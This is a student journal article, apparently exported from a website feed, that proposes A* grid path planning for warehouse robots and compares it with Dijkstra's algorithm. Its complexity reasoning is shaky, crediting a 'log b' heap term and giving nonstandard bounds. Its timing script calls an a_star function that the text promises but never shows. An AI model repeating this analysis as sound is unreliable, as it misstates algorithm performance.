<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="1018" height="942" src="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.17.23 PM.png" alt="" class="wp-image-3898" style="width:598px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.17.23 PM.png 1018w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.17.23 PM-300x278.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.17.23 PM-768x711.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.17.23 PM-1000x925.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.17.23 PM-230x213.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.17.23 PM-350x324.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.17.23 PM-480x444.png 480w" sizes="(max-width: 1018px) 100vw, 1018px" /><figcaption class="wp-element-caption">Figure 5: Simplified model of a realistic block warehouse with obstacles.</figcaption></figure>



<p>where d<sub>ij</sub> denotes the distance between vertices v<sub>i</sub> and v<sub>j</sub>. Given this graph representation of the warehouse layout, the optimization problem can be formally defined as finding the most efficient path or sequence of vertices to navigate from a designated source location to a target destination, subject to various constraints and objectives.</p>



<h2 class="wp-block-heading">Mathematical Formulation</h2>



<p>Let f denote the objective function, which quantifies the efficiency metric to be optimized. This metric may vary depending on the specific objectives of the warehouse management system. The objective function can be expressed as a function of the path traversed through the warehouse graph, represented as a sequence of vertices, with f : V → R, where R denotes the set of real numbers. The optimization problem may be subject to various constraints imposed by the warehouse environment, vehicle characteristics, safety regulations, and operational requirements. These constraints may include limitations on vehicle speed, maximum load capacity, aisle width, aisle congestion, and restricted access zones. The total cost associated with traversing a given path P in the warehouse graph can be expressed as the sum of distances between consecutive vertices along the path. Mathematically, the total cost C(P) can be represented as:</p>



<figure class="wp-block-image aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="620" height="200" src="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.18.25 PM.png" alt="" class="wp-image-3899" style="width:296px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.18.25 PM.png 620w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.18.25 PM-300x97.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.18.25 PM-230x74.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.18.25 PM-350x113.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.18.25 PM-480x155.png 480w" sizes="(max-width: 620px) 100vw, 620px" /></figure>



<p>where k represents the number of vertices in the path P, and d<sub>i,i+1</sub> denotes the distance between the i-th and (i + 1)-th vertices along the path. The variable x<sub>i,i+1</sub> is a binary variable: it takes the value 1 if the edge between vertices v<sub>i</sub> and v<sub>i+1</sub> is included, indicating that the edge is part of the path P; otherwise, it takes the value 0.</p>
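
<p>As a worked reading of this formula, the snippet below computes C(P) for a path in which every listed hop is included (all x<sub>i,i+1</sub> = 1), using the Manhattan distance defined above; the coordinates are made up for illustration.</p>

<pre class="wp-block-code"><code>def path_cost(path):
    """C(P): sum of Manhattan distances between consecutive vertices."""
    return sum(abs(x2 - x1) + abs(y2 - y1)
               for (x1, y1), (x2, y2) in zip(path, path[1:]))

# Vertices visited in order; each hop contributes its Manhattan length.
print(path_cost([(0, 0), (0, 3), (2, 3), (2, 5)]))  # 3 + 2 + 2 = 7</code></pre>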



<p>The core principle behind the algorithm lies in the A* search algorithm, a well-established method for optimal pathfinding in graphs and grids. In our specific implementation, the algorithm aims to find the shortest path for a robot that needs to visit multiple designated points sequentially. The algorithm maintains a priority queue (heap) data structure. This queue stores potential paths, each represented as a tuple containing the total cost incurred so far (distance travelled by the robot), the current cell coordinates of the robot, and the path history, which tracks the sequence of cells visited to reach the current cell. The algorithm then iteratively explores the neighbours of the cell with the lowest total cost according to the priority queue. This prioritisation ensures that the algorithm focuses on paths that are most likely to lead to the goal efficiently.</p>



<p>To further guide exploration, the algorithm employs a heuristic function, which estimates the remaining distance from the current cell to the final destination. In our case, we utilise the Manhattan distance heuristic: as stated above, it calculates the absolute differences in x and y coordinates between the current cell and the final destination, providing a simple and efficient estimate of the remaining distance. The estimated distance is added to the actual cost to create the total cost for each path; this combined value guides the prioritisation within the heap, favouring paths that are geographically closer to the goal. The two key data structures utilised by the algorithm are the priority queue and the visited set. The priority queue prioritises elements based on a key value, which in our implementation is the total cost of a path: the sum of the actual cost traversed so far and the estimated remaining distance calculated by the heuristic function. The heap efficiently retrieves the cell with the lowest total cost for exploration at each step, ensuring that the algorithm explores promising paths with potentially lower overall costs first and leading to a faster discovery of the optimal path. The visited set stores the coordinates of all cells that have already been explored. Adding a cell’s coordinates to the visited set after it has been explored ensures the algorithm does not revisit previously explored areas; this prevents redundant exploration and focuses the search on unexplored territory within the warehouse environment.</p>



<p>The algorithm incorporates obstacle detection to ensure the robot navigates only on valid paths. Before considering a neighbouring cell for exploration, the algorithm checks two conditions &#8211; the cell must be within the defined grid boundaries and the cell’s value in the grid representation must not be 1, which signifies an obstacle. By adhering to these conditions, the algorithm ensures that the robot only explores and utilises valid paths that are free of obstacles.</p>



<p>Once the robot reaches a designated point, the algorithm reconstructs the complete path taken so far using the information stored within the priority queue. Each cell in the queue stores its parent cell, indicating the cell from which it was explored; by backtracking through this parent-child relationship, the algorithm can reconstruct the complete path taken by the robot from the starting point to the current designated point. This backtracking process repeats for each designated point the robot needs to visit: the algorithm finds the next closest unvisited point using the heuristic function and repeats the exploration process until all designated points are visited. By accumulating the reconstructed paths for each point, the algorithm obtains the final complete path for the entire navigation task. Figure 6 below shows a simplified flowchart indicating the basic principles of the algorithm, and a code sketch of the procedure follows the figure.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="995" src="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.20.05 PM-1024x995.png" alt="" class="wp-image-3900" srcset="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.20.05 PM-1024x995.png 1024w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.20.05 PM-300x291.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.20.05 PM-768x746.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.20.05 PM-1000x971.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.20.05 PM-230x223.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.20.05 PM-350x340.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.20.05 PM-480x466.png 480w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.20.05 PM.png 1400w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 6: A basic understanding of the key principles of the algorithm.</figcaption></figure>



<h2 class="wp-block-heading">4 Comparative Analysis</h2>



<p>This section presents a comparative analysis of our proposed algorithm with Dijkstra’s algorithm, a popular pathfinding algorithm widely used today. Our aim is to evaluate the strengths and weaknesses of each approach in the context of robot pathfinding within warehouse environments with obstacles. This comparison will discuss the suitability of our algorithm for practical applications in warehouse navigation tasks.</p>



<h4 class="wp-block-heading">4.1 Time Complexity</h4>



<p>This section analyses the time complexity of the proposed algorithm and Dijkstra’s algorithm. Time complexity refers to the amount of time an algorithm takes to execute as the size of the input grows. In the context of robot pathfinding within a warehouse environment, the main factors affecting the input size are the number of grid cells (V), the number of obstacles, and the number of designated points (P).</p>



<h5 class="wp-block-heading">4.1.1 Proposed Algorithm</h5>



<p>The time complexity is analysed for both the average and worst case scenarios.</p>



<p><span style="text-decoration: underline;">Average Case</span> In the average case scenario, where the heuristic function provides a good estimate of the remaining distance, the time complexity of the proposed algorithm is expected to be:</p>



<p class="has-text-align-center">O((<sub>log</sub>b) ∗ V )</p>



<p>where log b reflects the repeated operations on the priority queue (heap) used for exploration, b is the branching factor (the average number of neighbours a cell has in the grid), and V is the total number of grid cells. The logarithmic term comes from the heap’s efficient retrieval and update operations.</p>



<p><span style="text-decoration: underline;">Worst Case</span> In the worst case scenario, where the heuristic function provides poor estimates, the time complexity of the algorithm can approach:</p>



<p class="has-text-align-center">O(W ∗<sub>log</sub>b∗V)</p>



<p>Here, W represents a factor dependent on the specific grid layout, obstacle distribution, and the starting and goal locations. This factor accounts for the additional exploration required due to the heuristic’s inefficiency in the worst case. However, the logarithmic term (log b) from the heap operations and the linear term (V) representing the total number of cells are likely to dominate the complexity even in the worst case.</p>



<h5 class="wp-block-heading">4.1.2 Dijkstra’s Algorithm</h5>



<p>Dijkstra’s algorithm has a time complexity of:</p>



<p class="has-text-align-center">O(V +E∗<sub>log</sub>V)</p>



<p>where E represents the total number of edges in the grid; in a warehouse environment, this translates to the number of valid connections between neighbouring cells.</p>



<h2 class="wp-block-heading">5 Results</h2>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="387" src="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM-1024x387.png" alt="" class="wp-image-3901" srcset="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM-1024x387.png 1024w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM-300x113.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM-768x290.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM-1536x581.png 1536w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM-1000x378.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM-230x87.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM-350x132.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM-480x182.png 480w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM.png 1756w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 7: Average Case Time Complexity Comparison </figcaption></figure>



<p>In the average case, the proposed algorithm outperforms Dijkstra’s algorithm, as shown in Figures 7a and 7b, due to the logarithmic term (log b) in its complexity. This term stems from the efficient use of a priority queue (heap) for exploration: heap operations, like inserting and retrieving elements, take logarithmic time with respect to the number of elements in the heap, which in our algorithm corresponds to the number of promising paths being explored. As the warehouse environment (grid size) grows, the number of paths to explore increases; however, due to the logarithmic nature of heap operations, the time spent managing the exploration queue grows far more slowly than in Dijkstra’s algorithm.</p>



<p>Dijkstra’s algorithm, on the other hand, has a time complexity that includes terms linear in the number of grid cells (V) and edges (E). As the warehouse environment becomes larger, the number of cells and edges increases proportionally, which translates to a more significant growth in execution time compared to the proposed algorithm in the average case. The logarithmic term in the proposed algorithm’s complexity therefore signifies that the exploration process scales more efficiently with the size of the warehouse grid. This efficiency advantage becomes more pronounced for larger warehouses, making the algorithm a more suitable choice in such scenarios.</p>



<p>While both algorithms can theoretically exhibit exponential dependence in the worst case, there are many potential advantages for the proposed algorithm in handling complex warehouse environments. Dijkstra’s algorithm’s dependence on the total number of grid cells (V) and edges (E) can lead to significant exploration overhead, especially in scenarios with dense obstacles or unfavourable start and goal locations. In such cases, the exhaustive exploration strategy of Dijkstra’s algorithm might struggle to efficiently navigate the environment.</p>



<p>On the other hand, our algorithm’s complexity includes a logarithmic term (log b) that stems from the efficient management of the exploration queue using a heap data structure. This term helps mitigate the impact of a growing number of potential paths on the processing time. Additionally, the proposed algorithm’s inherent prioritisation mechanism, guided by the heuristic function, restricts the exploration to a more focused search space around promising paths. This focus can significantly reduce the number of irrelevant paths explored compared to Dijkstra’s exhaustive approach, potentially preventing the worst-case complexity from becoming extremely slow in complex warehouse environments. The results can be seen in Figures 8a and 8b below.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="379" src="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM-1024x379.png" alt="" class="wp-image-3902" srcset="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM-1024x379.png 1024w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM-300x111.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM-768x284.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM-1536x568.png 1536w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM-1000x370.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM-230x85.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM-350x129.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM-480x177.png 480w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM.png 1742w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 8: Worst Case Time Complexity Comparison</figcaption></figure>



<p>Overall, by considering both average and worst-case scenarios, this comparative analysis highlights the potential of the proposed algorithm for efficient robot pathfinding in warehouse environments. The logarithmic term in its complexity signifies efficient exploration management using a priority queue, allowing our algorithm to scale more efficiently as the warehouse size increases and making it a preferable choice for real-world scenarios. While there may be a slight trade-off for very small warehouses, the overall analysis suggests that our proposed algorithm offers a significant time complexity advantage for larger and more realistic warehouse environments. The algorithm was developed with Python 3.12, and all simulations were done with MATLAB R2024a.</p>
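
<p>The figures above come from the author’s MATLAB simulations. As a rough way to approximate the comparison in Python, one can time the Section 3 sketch (<code>a_star</code>) against a Dijkstra-style baseline, which is simply the same search with the heuristic replaced by zero; the grid sizes and obstacle rate below are arbitrary choices, and absolute timings will vary by machine.</p>

<pre class="wp-block-code"><code>import random, time

def random_grid(n, obstacle_rate=0.2, seed=42):
    """n-by-n grid with roughly obstacle_rate of cells blocked."""
    rng = random.Random(seed)
    grid = [[1 if rng.random() &lt; obstacle_rate else 0 for _ in range(n)]
            for _ in range(n)]
    grid[0][0] = grid[n - 1][n - 1] = 0  # keep the endpoints open
    return grid

def zero(a, b):
    return 0  # removing the heuristic turns A* into Dijkstra's algorithm

for n in (50, 100, 200, 400):
    grid = random_grid(n)
    t0 = time.perf_counter()
    a_star(grid, (0, 0), (n - 1, n - 1))        # heuristic-guided search
    t1 = time.perf_counter()
    a_star(grid, (0, 0), (n - 1, n - 1), zero)  # Dijkstra-style baseline
    t2 = time.perf_counter()
    print(f"n={n}: guided {t1 - t0:.4f}s, baseline {t2 - t1:.4f}s")</code></pre>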



<h2 class="wp-block-heading">6 Conclusion</h2>



<p>In this research, a critical aspect of our analysis was the time complexity of the proposed algorithm. Optimizing warehouse operations requires efficient navigation, enabling robots to complete tasks in a timely manner. By comparing the time complexity of our algorithm to Dijkstra’s algorithm, we demonstrated the efficiency gains achieved by our method, particularly in scenarios with larger warehouse layouts. This efficiency translates to faster retrieval and storage times, ultimately contributing to increased warehouse throughput. While this research focused on time complexity, future work can explore the energy efficiency of the proposed algorithm: investigating the relationship between pathfinding strategies and robot energy consumption could pave the way for even more optimized warehouse operations that minimize energy use without compromising efficiency. Moreover, we highlighted the limitations of traditional pathfinding algorithms in these warehouse settings, particularly their failure to take obstacle avoidance into consideration and their higher time complexity. Further research can explore the integration of machine learning techniques to continuously learn and improve the algorithm’s performance in dynamic environments. Additionally, investigating methods for collaborative path planning between multiple robots operating within the warehouse could further optimize overall throughput and efficiency. By addressing the challenges of dynamic warehouse navigation, this research contributes to the development of more efficient and reliable automated systems for modern warehouses, supporting the ever-growing demands of the e-commerce sector and ensuring the smooth flow of goods within the supply chain.</p>



<h2 class="wp-block-heading">References</h2>



<ol class="wp-block-list">
<li>Liu, X., Cao, J., Yang, Y. &amp; Jiang, S. (2018). CPS-Based Smart Warehouse for Industry 4.0: A Survey of the Underlying Technologies. Computers, 7 (1) 13.</li>



<li>Roodbergen, K.J. &amp; De Koster, R. (2001). Routing methods for warehouses with multiple cross aisles. International Journal of Production Research, 39(9), 1865-1883.</li>



<li>Sanei, O., Nasiri, V., Marjani, M.R. &amp; Moattar Husseini, S.M. (2011). A heuristic algorithm for the warehouse space assignment problem considering operational constraints: with application in a case study. Proceedings of the 2011 International Conference on Industrial Engineering and Operations Management, Kuala Lumpur, Malaysia, January 22-24, 2011.</li>



<li>Shen, X., Yi, H. &amp; Wang, J. (2021). Optimization of picking in the warehouse. Journal of Physics: Conference Series, 1861.</li>



<li>Sun, Y., Fang, M. &amp; Su, Y. (2021). AGV Path Planning and Obstacle Avoidance Using Dijkstra’s Algorithm. Journal of Physics: Conference Series, 1746.</li>



<li>Yang, B., Li, W., Wang, J., Yang, J., Wang, T. &amp; Liu, X. (2020). A Novel Path Planning Algorithm for Warehouse Robots Based on a Two-Dimensional Grid Model. IEEE Access, 8, 80347-80357.</li>



<li>Liu, R. (2022). Research on Optimization of the AGV Shortest-Path Model and Obstacle Avoidance Planning in Dynamic Environments. Mathematical Problems in Engineering, 2022. doi.org/10.1155/2022/2239342.</li>



<li>Shetty, N., Sah, B. &amp; Chung, S.H. (2020). Route optimization for warehouse order picking operations via vehicle routing and simulation. Springer Nature Applied Sciences, 2(311). doi.org/10.1007/s42452-020-2076-x.</li>



<li>Tai, R., Wang, J. &amp; Chen, W. (2019). A prioritized planning algorithm of trajectory coordination based on time windows for multiple AGVs with delay disturbance. Assembly Automation, 39(5), 753-768. doi.org/10.1108/AA-03-2019-0054.</li>



<li>Chen, J., Zhang, X., Peng, X., Xu, D. &amp; Peng, J. (2022). Efficient routing for multi-AGV based on optimized Ant-agent. Computers &amp; Industrial Engineering, 167. doi.org/10.1016/j.cie.2022.108042.</li>



<li>Zhou, Y. &amp; Huang, N. (2022). Airport AGV path optimization model based on ant colony algorithm to optimize Dijkstra algorithm in urban systems. Sustainable Computing: Informatics and Systems, 35. doi.org/10.1016/j.suscom.2022.100716.</li>



<li>Meysami, A., Cuillière, J.-C., François, V. &amp; Kelouwani, S. (2022). Investigating the impact of triangle and quadrangle mesh representations on AGV path planning for various indoor environments: with or without inflation. Robotics, 11(2), 50. doi.org/10.3390/robotics11020050.</li>
</ol>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Paarth Sonkiya</h5><p>Paarth is a 12th grade student from India. A coding wizard by day and a stargazer by night, he is on a mission to unravel the mysteries of science, fueled by an unhealthy obsession with elegant algorithms and solutions. When Paarth is not debugging, you&#8217;ll find him scaling mountains or attempting to explain cloud computing to his sister. Paarth&#8217;s life goal is to write code so beautiful it makes other programmers weep &#8211; or at least leaves them mildly emotional. He is still trying to figure out if P equals NP, but he&#8217;s pretty sure it equals &#8220;Need Pizza&#8221;.
</p></figure></div>





<p>The post <a href="https://exploratiojournal.com/optimising-warehouse-navigation-a-novel-two-dimensional-grid-model-for-robot-path-planning-in-warehouse-logistics/">Optimising Warehouse Navigation: A Novel Two-Dimensional Grid Model for Robot Path Planning in Warehouse Logistics</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
